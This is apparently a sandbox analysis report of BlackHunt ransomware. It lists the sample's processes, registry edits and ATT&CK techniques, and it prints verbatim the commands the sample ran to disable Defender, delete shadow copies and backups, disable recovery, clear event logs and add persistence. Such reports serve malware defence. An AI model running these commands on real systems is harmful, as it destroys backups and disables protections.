PID 2500 wrote to memory of 2592 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 50 PID 2500 wrote to memory of 2592 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 50 PID 2500 wrote to memory of 2592 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 50 PID 2812 wrote to memory of 2620 2812 cmd.exe 52 PID 2812 wrote to memory of 2620 2812 cmd.exe 52 PID 2812 wrote to memory of 2620 2812 cmd.exe 52 PID 2500 wrote to memory of 2640 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 53 PID 2500 wrote to memory of 2640 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 53 PID 2500 wrote to memory of 2640 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 53 PID 2500 wrote to memory of 2640 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 53 PID 2500 wrote to memory of 2712 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 55 PID 2500 wrote to memory of 2712 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 55 PID 2500 wrote to memory of 2712 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 55 PID 2500 wrote to memory of 2712 2500 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 55 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe"C:\Users\Admin\AppData\Local\Temp\eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2500 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2700 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2784
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2796 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2356
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:2620
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵PID:2160
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:2992
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2752
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:2840
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2536
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2520
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:1164
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2632
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:1836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2764
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:2652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2592
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:1652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2640
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:1376
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2712
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:1436
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2484
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:1208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:1384
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2888
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:1284
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2956
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:2176
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2916
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2480
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:1232
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1776
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:572
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1780
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1888
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:2276
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1828
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:1716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:2128
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:2572
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:2136
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:332
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2008
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2104
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:3068
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:800
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:1372
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:1420
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1272
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:1200
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe" /F2⤵PID:880
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe" /F3⤵
- Creates scheduled task(s)
PID:2396
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2020
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:816
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:480
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:528
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:1436
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:1080
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:2920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2980
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2612
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1744
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:572
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1316
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:280
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:2240
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:1692
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:448
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2200
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:916
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:3424
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:3800
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:5200
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:3628
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:5896
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:3440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:3488
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:3540
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:4076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:1252
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:4020
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:3596
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:3732
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:3476
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:3900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:3428
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:3932
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:3848
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:3976
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1720
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:3568
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:4072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:3576
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:3172
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:3884
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2204
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:2664
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:2680
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:1576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:2916
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:2992
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:2608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:3772
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2120
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:3700
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:3324
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2536
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe"2⤵
- Deletes itself
PID:1524 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:2772
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1455865159-1620223068-355507471-20865455924268963611065944535-40507628-358774383"1⤵
- Modifies registry class
PID:2160
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2140
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2196
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k swprv1⤵PID:2104
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:2648
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:1420
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:332
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:880
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD58640a2dcf8d9d0893c91aeca951af454
SHA15a0ecf701e23fef82d3ac9cef659877aee78486f
